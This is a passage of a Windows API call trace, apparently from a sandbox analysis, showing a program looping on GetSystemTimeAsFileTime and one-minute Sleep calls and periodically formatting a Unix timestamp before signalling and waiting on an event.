	[0236.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74afe000, dwHighDateTime=0x1d50a6a)) 
	[0236.528] Sleep (dwMilliseconds=0xea60) 
	[0236.544] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74b24160, dwHighDateTime=0x1d50a6a)) 
	[0236.544] Sleep (dwMilliseconds=0xea60) 
	[0236.559] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74b4a2c0, dwHighDateTime=0x1d50a6a)) 
	[0236.559] Sleep (dwMilliseconds=0xea60) 
	[0236.575] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74b70420, dwHighDateTime=0x1d50a6a)) 
	[0236.575] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557877171\r\n") returned 12
	[0236.575] ResetEvent (hEvent=0xc) returned 1
	[0236.575] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0236.607] Sleep (dwMilliseconds=0xea60) 
	[0236.622] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74be2840, dwHighDateTime=0x1d50a6a)) 
	[0236.622] Sleep (dwMilliseconds=0xea60) 
	[0236.637] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74c089a0, dwHighDateTime=0x1d50a6a)) 
	[0236.637] Sleep (dwMilliseconds=0xea60) 
	[0236.652] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74c2eb00, dwHighDateTime=0x1d50a6a)) 
	[0236.652] Sleep (dwMilliseconds=0xea60) 
	[0236.668] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74c54c60, dwHighDateTime=0x1d50a6a)) 
	[0236.668] Sleep (dwMilliseconds=0xea60) 
	[0236.684] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74c7adc0, dwHighDateTime=0x1d50a6a)) 
	[0236.684] Sleep (dwMilliseconds=0xea60) 
	[0236.700] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74ca0f20, dwHighDateTime=0x1d50a6a)) 
	[0236.700] Sleep (dwMilliseconds=0xea60) 
	[0236.715] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74cc7080, dwHighDateTime=0x1d50a6a)) 
	[0236.715] Sleep (dwMilliseconds=0xea60) 
	[0236.731] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74ced1e0, dwHighDateTime=0x1d50a6a)) 
	[0236.731] Sleep (dwMilliseconds=0xea60) 
	[0236.746] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74d13340, dwHighDateTime=0x1d50a6a)) 
	[0236.746] Sleep (dwMilliseconds=0xea60) 
	[0236.762] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74d394a0, dwHighDateTime=0x1d50a6a)) 
	[0236.762] Sleep (dwMilliseconds=0xea60) 
	[0236.777] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74d5f600, dwHighDateTime=0x1d50a6a)) 
	[0236.777] Sleep (dwMilliseconds=0xea60) 
	[0236.793] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74d85760, dwHighDateTime=0x1d50a6a)) 
	[0236.793] Sleep (dwMilliseconds=0xea60) 
	[0236.809] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74dab8c0, dwHighDateTime=0x1d50a6a)) 
	[0236.809] Sleep (dwMilliseconds=0xea60) 
	[0236.833] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74dd1a20, dwHighDateTime=0x1d50a6a)) 
	[0236.833] Sleep (dwMilliseconds=0xea60) 
	[0236.840] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74df7b80, dwHighDateTime=0x1d50a6a)) 
	[0236.840] Sleep (dwMilliseconds=0xea60) 
	[0236.856] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74e1dce0, dwHighDateTime=0x1d50a6a)) 
	[0236.856] Sleep (dwMilliseconds=0xea60) 
	[0236.871] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74e43e40, dwHighDateTime=0x1d50a6a)) 
	[0236.872] Sleep (dwMilliseconds=0xea60) 
	[0236.887] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74e69fa0, dwHighDateTime=0x1d50a6a)) 
	[0236.887] Sleep (dwMilliseconds=0xea60) 
	[0236.902] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74e90100, dwHighDateTime=0x1d50a6a)) 
	[0236.902] Sleep (dwMilliseconds=0xea60) 
	[0236.919] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74eb6260, dwHighDateTime=0x1d50a6a)) 
	[0236.919] Sleep (dwMilliseconds=0xea60) 
	[0236.936] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74edc3c0, dwHighDateTime=0x1d50a6a)) 
	[0236.936] Sleep (dwMilliseconds=0xea60) 
	[0236.949] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74f02520, dwHighDateTime=0x1d50a6a)) 
	[0236.949] Sleep (dwMilliseconds=0xea60) 
	[0236.965] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74f28680, dwHighDateTime=0x1d50a6a)) 
	[0236.965] Sleep (dwMilliseconds=0xea60) 
	[0236.980] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74f4e7e0, dwHighDateTime=0x1d50a6a)) 
	[0236.981] Sleep (dwMilliseconds=0xea60) 
	[0236.996] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74f74940, dwHighDateTime=0x1d50a6a)) 
	[0236.996] Sleep (dwMilliseconds=0xea60) 
	[0237.014] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74f9aaa0, dwHighDateTime=0x1d50a6a)) 
	[0237.015] Sleep (dwMilliseconds=0xea60) 
	[0237.029] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74fc0c00, dwHighDateTime=0x1d50a6a)) 
	[0237.029] Sleep (dwMilliseconds=0xea60) 
	[0237.043] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x74fe6d60, dwHighDateTime=0x1d50a6a)) 
	[0237.043] Sleep (dwMilliseconds=0xea60) 
	[0237.059] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7500cec0, dwHighDateTime=0x1d50a6a)) 
	[0237.059] Sleep (dwMilliseconds=0xea60) 
	[0237.074] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75033020, dwHighDateTime=0x1d50a6a)) 
	[0237.074] Sleep (dwMilliseconds=0xea60) 
	[0237.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75059180, dwHighDateTime=0x1d50a6a)) 
	[0237.090] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557879031\r\n") returned 12
	[0237.090] ResetEvent (hEvent=0xc) returned 1
	[0237.090] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0237.107] Sleep (dwMilliseconds=0xea60) 
	[0237.121] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x750a5440, dwHighDateTime=0x1d50a6a)) 
	[0237.121] Sleep (dwMilliseconds=0xea60) 
	[0237.136] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x750cb5a0, dwHighDateTime=0x1d50a6a)) 
	[0237.136] Sleep (dwMilliseconds=0xea60) 
	[0237.152] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x750f1700, dwHighDateTime=0x1d50a6a)) 
	[0237.152] Sleep (dwMilliseconds=0xea60) 
	[0237.184] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7513d9c0, dwHighDateTime=0x1d50a6a)) 
	[0237.184] Sleep (dwMilliseconds=0xea60) 
	[0237.199] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75163b20, dwHighDateTime=0x1d50a6a)) 
	[0237.199] Sleep (dwMilliseconds=0xea60) 
	[0237.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75189c80, dwHighDateTime=0x1d50a6a)) 
	[0237.215] Sleep (dwMilliseconds=0xea60) 
	[0237.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x751afde0, dwHighDateTime=0x1d50a6a)) 
	[0237.230] Sleep (dwMilliseconds=0xea60) 
	[0237.245] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x751d5f40, dwHighDateTime=0x1d50a6a)) 
	[0237.245] Sleep (dwMilliseconds=0xea60) 
	[0237.261] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x751fc0a0, dwHighDateTime=0x1d50a6a)) 
	[0237.261] Sleep (dwMilliseconds=0xea60) 
	[0237.319] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7526e4c0, dwHighDateTime=0x1d50a6a)) 
	[0237.319] Sleep (dwMilliseconds=0xea60) 
	[0237.323] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75294620, dwHighDateTime=0x1d50a6a)) 
	[0237.324] Sleep (dwMilliseconds=0xea60) 
	[0237.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x752ba780, dwHighDateTime=0x1d50a6a)) 
	[0237.340] Sleep (dwMilliseconds=0xea60) 
	[0237.355] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x752e08e0, dwHighDateTime=0x1d50a6a)) 
	[0237.355] Sleep (dwMilliseconds=0xea60) 
	[0237.372] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75306a40, dwHighDateTime=0x1d50a6a)) 
	[0237.372] Sleep (dwMilliseconds=0xea60) 
	[0237.386] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7532cba0, dwHighDateTime=0x1d50a6a)) 
	[0237.386] Sleep (dwMilliseconds=0xea60) 
	[0237.401] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75352d00, dwHighDateTime=0x1d50a6a)) 
	[0237.401] Sleep (dwMilliseconds=0xea60) 
	[0237.417] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75378e60, dwHighDateTime=0x1d50a6a)) 
	[0237.417] Sleep (dwMilliseconds=0xea60) 
	[0237.433] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7539efc0, dwHighDateTime=0x1d50a6a)) 
	[0237.433] Sleep (dwMilliseconds=0xea60) 
	[0237.448] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x753c5120, dwHighDateTime=0x1d50a6a)) 
	[0237.448] Sleep (dwMilliseconds=0xea60) 
	[0237.464] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x753eb280, dwHighDateTime=0x1d50a6a)) 
	[0237.464] Sleep (dwMilliseconds=0xea60) 
	[0237.479] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x754113e0, dwHighDateTime=0x1d50a6a)) 
	[0237.479] Sleep (dwMilliseconds=0xea60) 
	[0237.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75437540, dwHighDateTime=0x1d50a6a)) 
	[0237.495] Sleep (dwMilliseconds=0xea60) 
	[0237.512] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7545d6a0, dwHighDateTime=0x1d50a6a)) 
	[0237.512] Sleep (dwMilliseconds=0xea60) 
	[0237.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75483800, dwHighDateTime=0x1d50a6a)) 
	[0237.528] Sleep (dwMilliseconds=0xea60) 
	[0237.542] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x754a9960, dwHighDateTime=0x1d50a6a)) 
	[0237.542] Sleep (dwMilliseconds=0xea60) 
	[0237.558] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x754cfac0, dwHighDateTime=0x1d50a6a)) 
	[0237.558] Sleep (dwMilliseconds=0xea60) 
	[0237.574] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x754f5c20, dwHighDateTime=0x1d50a6a)) 
	[0237.574] Sleep (dwMilliseconds=0xea60) 
	[0237.589] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7551bd80, dwHighDateTime=0x1d50a6a)) 
	[0237.590] Sleep (dwMilliseconds=0xea60) 
	[0237.612] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75541ee0, dwHighDateTime=0x1d50a6a)) 
	[0237.612] Sleep (dwMilliseconds=0xea60) 
	[0237.620] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75568040, dwHighDateTime=0x1d50a6a)) 
	[0237.620] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557880832\r\n") returned 12
	[0237.620] ResetEvent (hEvent=0xc) returned 1
	[0237.620] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0237.652] Sleep (dwMilliseconds=0xea60) 
	[0237.667] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x755da460, dwHighDateTime=0x1d50a6a)) 
	[0237.667] Sleep (dwMilliseconds=0xea60) 
	[0237.682] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x756005c0, dwHighDateTime=0x1d50a6a)) 
	[0237.682] Sleep (dwMilliseconds=0xea60) 
	[0237.698] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75626720, dwHighDateTime=0x1d50a6a)) 
	[0237.698] Sleep (dwMilliseconds=0xea60) 
	[0237.713] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7564c880, dwHighDateTime=0x1d50a6a)) 
	[0237.713] Sleep (dwMilliseconds=0xea60) 
	[0237.729] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x756729e0, dwHighDateTime=0x1d50a6a)) 
	[0237.729] Sleep (dwMilliseconds=0xea60) 
	[0237.744] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75698b40, dwHighDateTime=0x1d50a6a)) 
	[0237.745] Sleep (dwMilliseconds=0xea60) 
	[0237.760] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x756beca0, dwHighDateTime=0x1d50a6a)) 
	[0237.760] Sleep (dwMilliseconds=0xea60) 
	[0237.776] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x756e4e00, dwHighDateTime=0x1d50a6a)) 
	[0237.776] Sleep (dwMilliseconds=0xea60) 
	[0237.791] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7570af60, dwHighDateTime=0x1d50a6a)) 
	[0237.791] Sleep (dwMilliseconds=0xea60) 
	[0237.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x757310c0, dwHighDateTime=0x1d50a6a)) 
	[0237.807] Sleep (dwMilliseconds=0xea60) 
	[0237.823] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75757220, dwHighDateTime=0x1d50a6a)) 
	[0237.823] Sleep (dwMilliseconds=0xea60) 
	[0237.838] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7577d380, dwHighDateTime=0x1d50a6a)) 
	[0237.838] Sleep (dwMilliseconds=0xea60) 
	[0237.854] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x757a34e0, dwHighDateTime=0x1d50a6a)) 
	[0237.854] Sleep (dwMilliseconds=0xea60) 
	[0237.869] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x757c9640, dwHighDateTime=0x1d50a6a)) 
	[0237.869] Sleep (dwMilliseconds=0xea60) 
	[0237.885] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x757ef7a0, dwHighDateTime=0x1d50a6a)) 
	[0237.885] Sleep (dwMilliseconds=0xea60) 
	[0237.901] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75815900, dwHighDateTime=0x1d50a6a)) 
	[0237.901] Sleep (dwMilliseconds=0xea60) 
	[0237.917] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7583ba60, dwHighDateTime=0x1d50a6a)) 
	[0237.917] Sleep (dwMilliseconds=0xea60) 
	[0237.932] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75861bc0, dwHighDateTime=0x1d50a6a)) 
	[0237.932] Sleep (dwMilliseconds=0xea60) 
	[0237.947] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75887d20, dwHighDateTime=0x1d50a6a)) 
	[0237.947] Sleep (dwMilliseconds=0xea60) 
	[0237.963] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x758ade80, dwHighDateTime=0x1d50a6a)) 
	[0237.963] Sleep (dwMilliseconds=0xea60) 
	[0237.990] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x758d3fe0, dwHighDateTime=0x1d50a6a)) 
	[0237.990] Sleep (dwMilliseconds=0xea60) 
	[0237.994] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x758fa140, dwHighDateTime=0x1d50a6a)) 
	[0237.994] Sleep (dwMilliseconds=0xea60) 
	[0238.010] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x759202a0, dwHighDateTime=0x1d50a6a)) 
	[0238.010] Sleep (dwMilliseconds=0xea60) 
	[0238.025] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75946400, dwHighDateTime=0x1d50a6a)) 
	[0238.025] Sleep (dwMilliseconds=0xea60) 
	[0238.041] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x7596c560, dwHighDateTime=0x1d50a6a)) 
	[0238.041] Sleep (dwMilliseconds=0xea60) 
	[0238.057] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x759926c0, dwHighDateTime=0x1d50a6a)) 
	[0238.057] Sleep (dwMilliseconds=0xea60) 
	[0238.072] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x759b8820, dwHighDateTime=0x1d50a6a)) 
	[0238.072] Sleep (dwMilliseconds=0xea60) 
	[0238.088] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x759de980, dwHighDateTime=0x1d50a6a)) 
	[0238.088] Sleep (dwMilliseconds=0xea60) 
	[0238.103] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75a04ae0, dwHighDateTime=0x1d50a6a)) 
	[0238.103] Sleep (dwMilliseconds=0xea60) 
	[0238.119] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75a2ac40, dwHighDateTime=0x1d50a6a)) 
	[0238.120] Sleep (dwMilliseconds=0xea60) 
	[0238.134] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75a50da0, dwHighDateTime=0x1d50a6a)) 
	[0238.135] wsprintfA (in: param_1=0xf8fe60, param_2="%ld\r\n" | out: param_1="1557882692\r\n") returned 12
	[0238.135] ResetEvent (hEvent=0xc) returned 1
	[0238.135] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0238.136] Sleep (dwMilliseconds=0xea60) 
	[0238.150] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75a76f00, dwHighDateTime=0x1d50a6a)) 
	[0238.150] Sleep (dwMilliseconds=0xea60) 
	[0238.187] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75ac31c0, dwHighDateTime=0x1d50a6a)) 
	[0238.187] Sleep (dwMilliseconds=0xea60) 
	[0238.199] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75ae9320, dwHighDateTime=0x1d50a6a)) 
	[0238.199] Sleep (dwMilliseconds=0xea60) 
	[0238.213] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75b0f480, dwHighDateTime=0x1d50a6a)) 
	[0238.213] Sleep (dwMilliseconds=0xea60) 
	[0238.230] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75b355e0, dwHighDateTime=0x1d50a6a)) 
	[0238.230] Sleep (dwMilliseconds=0xea60) 
	[0238.244] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75b5b740, dwHighDateTime=0x1d50a6a)) 
	[0238.244] Sleep (dwMilliseconds=0xea60) 
	[0238.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf8fe38 | out: lpSystemTimeAsFileTime=0xf8fe38*(dwLowDateTime=0x75b818a0, dwHighDateTime=0x1d50a6a)) 
	[0238.259] Sleep (dwMilliseconds=0xea60) 
